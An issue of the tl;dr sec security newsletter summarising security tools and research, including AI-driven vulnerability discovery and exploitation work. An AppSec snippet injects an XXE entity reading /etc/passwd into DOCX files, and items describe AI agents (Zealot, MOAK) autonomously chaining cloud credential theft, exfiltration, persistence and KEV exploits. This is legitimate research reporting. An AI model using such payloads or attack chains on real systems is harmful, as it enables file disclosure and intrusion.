
[tl;dr sec] #326 – AI Auto Exploiting Vulnerabilities, GitHub RCE, Autonomous Cloud Hacking Agent


Hackathon

This week Semgrep friends have flown in from all over the world to crazily build together.

Engineers, security researchers, designers, and, as we are generous of spirit, even product managers.

The fact that we do this every few quarters is one of my favorite things about Semgrep.

A number of our coolest features came from a hack week: new engine features, AI triage before it was cool, and even Semgrep itself (back before that was the company’s focus, or name).

I also really appreciate the in person time for learning about who people are outside of work.

Hearing stories about their garden, travels, partner, or kids over boba and late night pizza.

Team dinner! If you look closely, you may notice a Katie Paxton-Fear (InsiderPhD). Shout-out to Shelley Wu, who recently joined the team!

Can’t wait for the demo competition and showcase tomorrow!

Prowler automates security and compliance across any cloud environment, with agentless coverage of cloud infrastructure, SaaS, Kubernetes, containers, Infrastructure as Code, and more. It detects vulnerabilities and misconfigurations, prioritizes risks, accelerates remediation, and automates audit-ready compliance. 

Prowler has become the security platform of choice for thousands of cloud teams, with 45M+ downloads, 13K+ GitHub stars, and 300+ global contributors. Prowler Cloud delivers cloud security 10x more cost-effectively than alternatives.

AppSec

BuffaloWill/oxml_xxe
Tool by Willis Vandevanter that embeds XXE payloads into OXML formats (DOCX, XLSX, PPTX, ODT, ODG, ODP, ODS), SVG, and raw XML for testing XXE vulnerabilities in document parsers. BlackHat USA 2015 slides.
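For context, a DOCX is just a ZIP archive of XML parts, which is what makes this attack surface so convenient. Here's a minimal Python sketch of the idea (not oxml_xxe's implementation; `inject_xxe` and the payload are illustrative):

```python
import io
import zipfile

# Hypothetical sketch of the technique oxml_xxe automates: a DOCX is a ZIP
# archive, so an XXE probe can be planted by rewriting word/document.xml with
# a DOCTYPE that declares an external entity. (A full payload would also
# reference &xxe; inside a text node of the document body.)
XXE_DOCTYPE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
)

def inject_xxe(docx_bytes: bytes, target: str = "word/document.xml") -> bytes:
    """Return a copy of the archive with the XXE DOCTYPE prepended to target."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == target:
                # Drop the original XML declaration, then prepend the payload.
                data = XXE_DOCTYPE.encode() + data.split(b"?>", 1)[-1]
            dst.writestr(item, data)
    return out.getvalue()
```

The rest of the archive is copied through untouched, so the file still opens as a normal document in anything that doesn't resolve external entities.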

Trailmark turns code into graphs
Trail of Bits’ Scott Arciszewski announces Trailmark, an open source library that parses source code into queryable call graphs of functions, classes, call relationships, and semantic metadata. Trailmark uses tree-sitter for AST parsing and rustworkx for graph traversal, supporting 17 languages including C, Rust, Go, Python, and Solidity. The library ships with eight Claude Code skills (genotoxic, vector-forge, diagram, crypto-protocol-diagram, graph-evolution, mermaid-to-proverif, audit-augmentation, and trailmark) that enable graph-based security analysis like mutation triage (which mutant survivors are reachable from untrusted input), blast radius calculation, and taint propagation tracking.

Using Trailmark on cryptographic libraries, they identified architectural bottlenecks and high-value fuzzing targets such as codec parsers.

“By leveraging AI-augmented tooling, particularly automated reverse engineering using IDA MCP, we were able to do what was previously too costly. Using AI, we rapidly analyzed GitHub’s compiled binaries, reconstructed internal protocols, and systematically identified where user input could influence server behavior across the entire pipeline.”

Scanners scream. Leadership wants dates. Engineering wants stability. And “just upgrade” (the only answer most teams hear) keeps colliding with breaking changes, flaky tests, and calendar risk. In Vibe Coding a Backport, Root’s John Amaral argues for backporting as a first-class remediation discipline and walks through how agentic workflows are finally making it scalable: pin what you ship, understand the upstream fix, apply minimal change, validate with tests. A practical playbook for the messy real world.

The interactive workshop format is pretty cool. Automatically backporting patches using AI is a neat approach that wasn’t feasible before; it’s fun to see new takes on longstanding challenges.

Cloud Security

CloudTrail for AI Agents
Alex Smolen introduces Trailtool, a tool that pre-aggregates AWS CloudTrail logs by entity (People, Sessions, Roles, Services, Resources) to enable faster queries and AI agent workflows compared to traditional SIEM or CloudTrail Lake approaches. The post walks through using Trailtool to detect “ClickOps” modifications, define least-privilege IAM policies for roles, respond to AccessDenied errors, and validate emergency break-glass access justifications.
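The pre-aggregation idea can be sketched roughly like this. The field names follow CloudTrail's event schema, but the functions and heuristic are illustrative, not Trailtool's actual design:

```python
from collections import defaultdict

def aggregate_by_entity(events: list[dict]) -> dict[str, list[dict]]:
    """Bucket CloudTrail events by the entity that performed them, so
    'what did this role actually do?' becomes a single dict lookup."""
    by_entity: dict[str, list[dict]] = defaultdict(list)
    for e in events:
        arn = e.get("userIdentity", {}).get("arn", "unknown")
        by_entity[arn].append(e)
    return by_entity

def clickops_candidates(by_entity: dict[str, list[dict]]) -> list[dict]:
    """Flag console-originated write events (a rough ClickOps heuristic:
    CloudTrail sets sessionCredentialFromConsole for console sessions)."""
    hits = []
    for events in by_entity.values():
        for e in events:
            read_only = e["eventName"].startswith(("Get", "List", "Describe"))
            if e.get("sessionCredentialFromConsole") == "true" and not read_only:
                hits.append(e)
    return hits
```

Once events are grouped per entity up front, both humans and agents can answer per-role questions without scanning the full log each time.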

Can AI Attack the Cloud? Lessons From Building an Autonomous Cloud Offensive Multi-Agent System
Palo Alto Networks’ Yahav Festinger and Chen Doytshman describe “Zealot,” a multi-agent LLM penetration testing PoC built with LangGraph to empirically test autonomous AI offensive capabilities against cloud environments. The system uses a supervisor-agent architecture with three specialist agents (Infrastructure, Application Security, and Cloud Security) that share attack state through a centralized AttackState object. In sandbox testing against a misconfigured GCP environment, Zealot autonomously chained SSRF, GCP Instance Metadata Service credential theft, BigQuery enumeration, privilege escalation via self-granted storage.objectAdmin permissions, and data exfiltration, completing the full attack chain with minimal human guidance.

Learnings: Zealot demonstrated unexpected initiative, such as autonomously injecting SSH keys for persistence, though it occasionally required human intervention to prevent resource-wasting “rabbit hole” scenarios. They found AI doesn’t create new attack surfaces; it serves as a force multiplier by rapidly exploiting well-known misconfigurations at machine speed.

I like how the post describes their reasoning on why they used a hierarchical supervisor-agent architecture, what tools they chose to give each agent, and the discussion of state management and memory (context sharing, what AttackState tracks across phases). Lots of tactical details!
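A minimal sketch of the supervisor pattern with shared state, as I read the post; the class fields and routing here are hypothetical stand-ins for Zealot's LangGraph implementation:

```python
from dataclasses import dataclass, field

@dataclass
class AttackState:
    """Shared state every specialist agent reads and mutates.
    (Illustrative fields; the real AttackState tracks much more.)"""
    credentials: dict = field(default_factory=dict)
    findings: list = field(default_factory=list)
    phase: str = "recon"

def supervisor(state: AttackState, agents: dict) -> AttackState:
    """Route to a specialist based on the current phase; each agent returns
    the (mutated) shared state, and the supervisor advances the phase."""
    order = ["recon", "exploit", "escalate", "done"]
    while state.phase != "done":
        state = agents[state.phase](state)
        state.phase = order[order.index(state.phase) + 1]
    return state
```

The key property is that later agents see everything earlier ones learned (credentials, findings) through the one shared object, rather than re-discovering it.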

Supply Chain

The case for dependency cooldowns in a post-axios world
Datadog’s Kennedy Toomey discusses recent npm supply chain attacks, and notes that in Datadog’s 2026 State of DevSecOps report, they found half of organizations install at least one dependency within a day of release. Also good to keep in mind: using npm’s semantic versioning with ^ and ~ ranges automatically accepts future updates, meaning you’re implicitly trusting future (potentially malicious) code. Yarn, pnpm, npm, and Dependabot all support dependency cooldowns now.

cooldowns.dev
A configuration reference for dependency cooldowns across major package managers by Martin Prpič, covering uv, pip, npm, pnpm, Yarn, Bun, Deno, and cargo-cooldown, plus Renovate and Dependabot configurations. To make setup easier, Prpič also created cooldowns.sh, a helper script that configures and verifies cooldowns across all supported tools in one command, with a check subcommand suitable as a CI gate.

Note that cooldowns aren’t a complete defense though, since they won’t catch typosquatting, long-term maintainer compromise like xz-utils, or zero-days in already-installed packages.

Blue Team

Karib0u/rustinel
By Théo Foucher: Rustinel is an open-source endpoint detection runtime for Windows and Linux. It collects native telemetry from ETW and eBPF, normalizes events into Sysmon-style fields, evaluates Sigma, YARA, and IOC detections, and emits ECS-compatible NDJSON alerts.
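The normalization step is the part that lets one rule set cover both platforms; a toy sketch (the field map is illustrative, not rustinel's actual mapping):

```python
# Map raw ETW/eBPF-ish process-event fields into Sysmon-style names, so a
# single set of Sigma detections can run over Windows and Linux telemetry.
# Field names on the left are hypothetical; the right side follows Sysmon.
SYSMON_FIELD_MAP = {
    "exe_path": "Image",
    "parent_exe_path": "ParentImage",
    "cmdline": "CommandLine",
    "pid": "ProcessId",
}

def normalize(raw: dict) -> dict:
    """Rename known fields to Sysmon-style names; pass unknown ones through."""
    return {SYSMON_FIELD_MAP.get(k, k): v for k, v in raw.items()}
```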

Tracking Adversaries: EvilCorp, the RansomHub affiliate
Will Thomas (BushidoToken) describes the connection between EvilCorp, a sanctioned Russian cybercrime group, and RansomHub, a prominent ransomware-as-a-service operation. The link is established through shared TTPs, including the use of SocGholish malware for initial access and a Python backdoor (VIPERTUNNEL) for post-exploitation. Because EvilCorp has been under US sanctions since 2019, making it illegal for affected organizations to pay ransoms to them, this association may lead to sanctions against RansomHub as well (and thus legal risk to victims paying them).

Why a Decade of Writing Detection Logic Makes the Mythos Exploit Numbers Less Scary
David Burkett argues that despite AI-powered systems finding vulnerabilities at an unprecedented rate, the impact on defenders is less catastrophic than headlines suggest because: new exploits have always exceeded defenders’ ability to write detections (that’s why you detect behaviors over individual IoCs and exploits), adversaries often don’t need zero days (see: ClickFix, phishing), and detection logic doesn’t map 1:1 with exploits (e.g. there are 1000s of RCEs in Microsoft Office, but if Office spawns powershell.exe, that’s probably bad).
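That last point can be made concrete with a toy behavioral rule (the process lists and function name are illustrative):

```python
# One behavioral detection covers a whole class of exploits: any Office
# process spawning a shell interpreter is suspicious, regardless of which
# of the thousands of Office RCEs got it there.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe"}

def suspicious_child(parent_image: str, child_image: str) -> bool:
    """Compare basenames of the parent/child process image paths."""
    parent = parent_image.lower().rsplit("\\", 1)[-1]
    child = child_image.lower().rsplit("\\", 1)[-1]
    return parent in OFFICE and child in SHELLS
```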

AI + Security

kpolley/redai
By Kyle Polley: A terminal workbench for AI-driven vulnerability discovery and live validation. After scanner agents produce candidate findings, validator agents work inside a live environment (a running instance of the target, plus whatever tools they need to interact with it) and try to prove or disprove each finding by clicking through the UI, hitting endpoints, writing PoC scripts, hosting helper servers, and saving the evidence. RedAI currently ships with validator plugins for agents to drive Chrome via agent-browser and an iOS Simulator, but it’s extendable.

MOAK – Mother of All KEVs
Niv Hoffman, Yair Saban, et al. created MOAK, an agentic workflow that autonomously exploits 98% of open source KEVs (Known Exploited Vulnerabilities) using publicly available models (Opus 4.6 and GPT 5.4). They found MOAK was able to automatically create exploits for 174/178 KEVs that were published after the models’ knowledge cutoffs (to guarantee no contamination).

The workflow: a collector gathers the CVE’s vulnerability description and relevant code changes. The researcher analyzes the vulnerability and reconstructs the full exploitation path, extracting primitives from the vulnerable code and builds a graph of possible exploit chains. The builder builds a controlled environment to reproduce the vulnerable system, the exploiter converts the research into a working exploit, then finally the judge verifies that the exploit and environment are valid and realistic.
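Assuming nothing beyond the description above, the five-stage loop might look like this, with each agent stubbed as a plain callable (stage names follow the post; the function and retry logic are hypothetical):

```python
def run_pipeline(cve_id: str, stages: dict, max_attempts: int = 3):
    """Drive the collector -> researcher -> builder -> exploiter -> judge
    loop, retrying exploit generation until the judge accepts or we give up."""
    context = stages["collector"](cve_id)        # advisory + relevant code changes
    research = stages["researcher"](context)     # reconstructed exploit-chain graph
    env = stages["builder"](research)            # reproducible vulnerable environment
    for _ in range(max_attempts):
        exploit = stages["exploiter"](research, env)
        if stages["judge"](exploit, env):        # valid and realistic?
            return exploit
    return None
```

The judge-in-the-loop structure is what makes the 174/178 number meaningful: an exploit only counts once an independent stage verifies both the exploit and the environment.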

The “Test Case: React2Shell” write-up is very cool and nicely detailed on how the workflow can iteratively find gadgets and exploit primitives, form hypotheses, and iterate until it discovers a path that works.

This is one of the more detailed write-ups of approaches I’ve seen in this space, worth reading!

GPT-5.5: Mythos-Like Hacking, Open to All
XBOW’s Albert Ziegler and Steve Buckley call GPT-5.5 a Mythos-like step change in vulnerability detection. On their internal benchmark of real vulnerabilities in open-source applications, GPT-5.5 dropped the miss rate from GPT-5’s 40% (and Opus 4.6’s 18%) to 10%, with black-box performance now exceeding what GPT-5 achieved with source code access, and white-box performance pulling away so far it “effectively killed” their benchmark. The model also logs into target systems in roughly half the iterations of the next-best model and persists on failing paths only half as often as previous GPT versions or Opus, a meaningful gain given RLHF tends to bias models against giving up.

CTFs in the AI Era
Include Security’s Laurence Tennant attended BSidesSF 2026 CTF, where the top 10 teams cleared every challenge with AI agents. Top teams ran pipelines that monitored CTFd for new challenges, spun up multiple agents in parallel, used a coordinator LLM to share insights between them when one stalled, and auto-submitted flags.

CTFs play to everything LLMs are good at: bounded context, clear success criteria, instant feedback, and abundant public write-ups in the training data. Laurence contrasts CTFs with pentesting, in which goals are open-ended, false positives need business context to triage, code bases are large (not just an isolated few hundred lines), findings have to be written up for a client, and stepping outside scope has real consequences. The winning team open-sourced their agent, which cleared all 52 challenges.

I do wonder if AI has “solved” CTFs. Maybe there will be new or separate CTFs where AI isn’t allowed, or some other rules to keep the challenges human-focused. Interesting times.

Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I’d really appreciate it if you’d forward it to them!

P.S. Feel free to connect with me on LinkedIn  


